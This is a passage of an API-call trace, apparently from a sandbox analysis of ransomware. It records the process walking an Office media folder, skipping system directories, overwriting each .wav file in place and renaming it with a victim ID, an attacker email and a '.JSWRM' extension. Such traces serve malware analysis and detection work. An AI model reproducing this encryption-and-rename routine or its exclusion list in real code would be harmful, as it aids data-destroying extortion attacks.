dwFlags=0x0, lpWideCharStr="LYNC_dtmf3.wav", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0135.115] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_dtmf3.wav", cchWideChar=14, lpMultiByteStr=0x345eba8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_dtmf3.wav", lpUsedDefaultChar=0x0) returned 14 [0135.116] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0135.116] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0135.116] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_dtmf3.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_dtmf3.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0135.116] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9610) returned 1 [0135.116] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.116] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x2580, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x2580, lpOverlapped=0x0) returned 1 [0135.118] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.118] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x2580, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x2580, lpOverlapped=0x0) returned 1 [0135.119] CloseHandle (hObject=0x238) returned 1 [0135.119] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_dtmf3.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_dtmf3.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_dtmf3.wav.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_dtmf3.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0135.120] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1afa24f0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1afa24f0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b03add6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x25b4, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="LYNC_dtmf4.wav", cAlternateFileName="LYNC_D~4.WAV")) returned 1 [0135.120] lstrcmpiW (lpString1="LYNC_dtmf4.wav", lpString2=".") returned 1 [0135.120] lstrcmpiW (lpString1="LYNC_dtmf4.wav", lpString2="..") returned 1 [0135.120] lstrcmpiW (lpString1="LYNC_dtmf4.wav", lpString2="...") returned 1 [0135.120] lstrcmpiW (lpString1="LYNC_dtmf4.wav", lpString2="windows") returned -1 [0135.120] lstrcmpiW (lpString1="LYNC_dtmf4.wav", lpString2="recovery") returned -1 [0135.120] lstrcmpiW (lpString1="LYNC_dtmf4.wav", lpString2="perflogs") returned -1 [0135.120] lstrcmpiW (lpString1="LYNC_dtmf4.wav", lpString2="documents and settings") returned 1 [0135.120] lstrcmpiW (lpString1="LYNC_dtmf4.wav", lpString2="$RECYCLE.BIN") returned 1 [0135.120] lstrcmpiW (lpString1="LYNC_dtmf4.wav", lpString2="system volume information") returned -1 [0135.120] lstrcmpiW (lpString1="LYNC_dtmf4.wav", lpString2="msocache") returned -1 [0135.120] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_dtmf4.wav", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0135.120] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_dtmf4.wav", cchWideChar=14, lpMultiByteStr=0x345ebd8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_dtmf4.wav", lpUsedDefaultChar=0x0) returned 14 [0135.120] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_dtmf4.wav", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0135.120] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_dtmf4.wav", cchWideChar=14, lpMultiByteStr=0x345eba8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_dtmf4.wav", lpUsedDefaultChar=0x0) returned 14 [0135.120] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0135.120] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0135.120] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_dtmf4.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_dtmf4.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0135.121] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9652) returned 1 [0135.121] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.121] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x25b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x25b0, lpOverlapped=0x0) returned 1 [0135.123] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.123] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x25b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x25b0, lpOverlapped=0x0) returned 1 [0135.123] CloseHandle (hObject=0x238) returned 1 [0135.126] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_dtmf4.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_dtmf4.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_dtmf4.wav.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_dtmf4.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0135.126] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1afa24f0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1afa24f0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1afc86d3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x25aa, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="LYNC_dtmf5.wav", cAlternateFileName="LYNC_D~3.WAV")) returned 1 [0135.126] lstrcmpiW (lpString1="LYNC_dtmf5.wav", lpString2=".") returned 1 [0135.127] lstrcmpiW (lpString1="LYNC_dtmf5.wav", lpString2="..") returned 1 [0135.127] lstrcmpiW (lpString1="LYNC_dtmf5.wav", lpString2="...") returned 1 [0135.127] lstrcmpiW (lpString1="LYNC_dtmf5.wav", lpString2="windows") returned -1 [0135.127] lstrcmpiW (lpString1="LYNC_dtmf5.wav", lpString2="recovery") returned -1 [0135.127] lstrcmpiW (lpString1="LYNC_dtmf5.wav", lpString2="perflogs") returned -1 [0135.127] lstrcmpiW (lpString1="LYNC_dtmf5.wav", lpString2="documents and settings") returned 1 [0135.127] lstrcmpiW (lpString1="LYNC_dtmf5.wav", lpString2="$RECYCLE.BIN") returned 1 [0135.127] lstrcmpiW (lpString1="LYNC_dtmf5.wav", lpString2="system volume information") returned -1 [0135.127] lstrcmpiW (lpString1="LYNC_dtmf5.wav", lpString2="msocache") returned -1 [0135.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_dtmf5.wav", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0135.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_dtmf5.wav", cchWideChar=14, lpMultiByteStr=0x345ebd8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_dtmf5.wav", lpUsedDefaultChar=0x0) returned 14 [0135.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_dtmf5.wav", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0135.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_dtmf5.wav", cchWideChar=14, lpMultiByteStr=0x345eba8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_dtmf5.wav", lpUsedDefaultChar=0x0) returned 14 [0135.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0135.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0135.127] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_dtmf5.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_dtmf5.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0135.128] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9642) returned 1 [0135.128] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.128] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x25a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x25a0, lpOverlapped=0x0) returned 1 [0135.130] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.130] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x25a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x25a0, lpOverlapped=0x0) returned 1 [0135.130] CloseHandle (hObject=0x238) returned 1 [0135.130] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_dtmf5.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_dtmf5.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_dtmf5.wav.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_dtmf5.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0135.131] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1af7c22b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1af7c22b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b03add6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x25b2, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="LYNC_dtmf6.wav", cAlternateFileName="LYNC_D~2.WAV")) returned 1 [0135.131] lstrcmpiW (lpString1="LYNC_dtmf6.wav", lpString2=".") returned 1 [0135.131] lstrcmpiW (lpString1="LYNC_dtmf6.wav", lpString2="..") returned 1 [0135.131] lstrcmpiW (lpString1="LYNC_dtmf6.wav", lpString2="...") returned 1 [0135.131] lstrcmpiW (lpString1="LYNC_dtmf6.wav", lpString2="windows") returned -1 [0135.131] lstrcmpiW (lpString1="LYNC_dtmf6.wav", lpString2="recovery") returned -1 [0135.131] lstrcmpiW (lpString1="LYNC_dtmf6.wav", lpString2="perflogs") returned -1 [0135.131] lstrcmpiW (lpString1="LYNC_dtmf6.wav", lpString2="documents and settings") returned 1 [0135.131] lstrcmpiW (lpString1="LYNC_dtmf6.wav", lpString2="$RECYCLE.BIN") returned 1 [0135.131] lstrcmpiW (lpString1="LYNC_dtmf6.wav", lpString2="system volume information") returned -1 [0135.131] lstrcmpiW (lpString1="LYNC_dtmf6.wav", lpString2="msocache") returned -1 [0135.132] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_dtmf6.wav", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0135.132] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_dtmf6.wav", cchWideChar=14, lpMultiByteStr=0x345ebd8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_dtmf6.wav", lpUsedDefaultChar=0x0) returned 14 [0135.132] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_dtmf6.wav", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0135.132] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_dtmf6.wav", cchWideChar=14, lpMultiByteStr=0x345eba8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_dtmf6.wav", lpUsedDefaultChar=0x0) returned 14 [0135.132] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0135.132] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0135.132] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_dtmf6.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_dtmf6.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0135.132] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9650) returned 1 [0135.132] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.132] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x25b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x25b0, lpOverlapped=0x0) returned 1 [0135.135] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.135] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x25b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x25b0, lpOverlapped=0x0) returned 1 [0135.136] CloseHandle (hObject=0x238) returned 1 [0135.136] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_dtmf6.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_dtmf6.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_dtmf6.wav.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_dtmf6.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0135.137] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1b06103b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b06103b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b0ad4d6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2578, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="LYNC_dtmf7.wav", cAlternateFileName="LYFFE8~1.WAV")) returned 1 [0135.137] lstrcmpiW (lpString1="LYNC_dtmf7.wav", lpString2=".") returned 1 [0135.137] lstrcmpiW (lpString1="LYNC_dtmf7.wav", lpString2="..") returned 1 [0135.137] lstrcmpiW (lpString1="LYNC_dtmf7.wav", lpString2="...") returned 1 [0135.137] lstrcmpiW (lpString1="LYNC_dtmf7.wav", lpString2="windows") returned -1 [0135.137] lstrcmpiW (lpString1="LYNC_dtmf7.wav", lpString2="recovery") returned -1 [0135.137] lstrcmpiW (lpString1="LYNC_dtmf7.wav", lpString2="perflogs") returned -1 [0135.137] lstrcmpiW (lpString1="LYNC_dtmf7.wav", lpString2="documents and settings") returned 1 [0135.137] lstrcmpiW (lpString1="LYNC_dtmf7.wav", lpString2="$RECYCLE.BIN") returned 1 [0135.137] lstrcmpiW (lpString1="LYNC_dtmf7.wav", lpString2="system volume information") returned -1 [0135.137] lstrcmpiW (lpString1="LYNC_dtmf7.wav", lpString2="msocache") returned -1 [0135.137] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_dtmf7.wav", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0135.137] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_dtmf7.wav", cchWideChar=14, lpMultiByteStr=0x345ebd8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_dtmf7.wav", lpUsedDefaultChar=0x0) returned 14 [0135.137] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_dtmf7.wav", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0135.137] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_dtmf7.wav", cchWideChar=14, lpMultiByteStr=0x345eba8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_dtmf7.wav", lpUsedDefaultChar=0x0) returned 14 [0135.137] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0135.137] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0135.137] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_dtmf7.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_dtmf7.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0135.140] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9592) returned 1 [0135.140] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.140] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x2570, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x2570, lpOverlapped=0x0) returned 1 [0135.142] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.142] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x2570, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x2570, lpOverlapped=0x0) returned 1 [0135.143] CloseHandle (hObject=0x238) returned 1 [0135.143] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_dtmf7.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_dtmf7.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_dtmf7.wav.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_dtmf7.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0135.144] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1b06103b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b06103b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b0ad4d6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x25e0, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="LYNC_dtmf8.wav", cAlternateFileName="LYD480~1.WAV")) returned 1 [0135.145] lstrcmpiW (lpString1="LYNC_dtmf8.wav", lpString2=".") returned 1 [0135.145] lstrcmpiW (lpString1="LYNC_dtmf8.wav", lpString2="..") returned 1 [0135.145] lstrcmpiW (lpString1="LYNC_dtmf8.wav", lpString2="...") returned 1 [0135.145] lstrcmpiW (lpString1="LYNC_dtmf8.wav", lpString2="windows") returned -1 [0135.145] lstrcmpiW (lpString1="LYNC_dtmf8.wav", lpString2="recovery") returned -1 [0135.145] lstrcmpiW (lpString1="LYNC_dtmf8.wav", lpString2="perflogs") returned -1 [0135.145] lstrcmpiW (lpString1="LYNC_dtmf8.wav", lpString2="documents and settings") returned 1 [0135.145] lstrcmpiW (lpString1="LYNC_dtmf8.wav", lpString2="$RECYCLE.BIN") returned 1 [0135.145] lstrcmpiW (lpString1="LYNC_dtmf8.wav", lpString2="system volume information") returned -1 [0135.145] lstrcmpiW (lpString1="LYNC_dtmf8.wav", lpString2="msocache") returned -1 [0135.145] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_dtmf8.wav", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0135.145] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_dtmf8.wav", cchWideChar=14, lpMultiByteStr=0x345ebd8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_dtmf8.wav", lpUsedDefaultChar=0x0) returned 14 [0135.145] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_dtmf8.wav", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0135.145] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_dtmf8.wav", cchWideChar=14, lpMultiByteStr=0x345eba8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_dtmf8.wav", lpUsedDefaultChar=0x0) returned 14 [0135.145] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0135.145] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0135.145] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_dtmf8.wav" (normalized: "c:\\program files\\microsoft 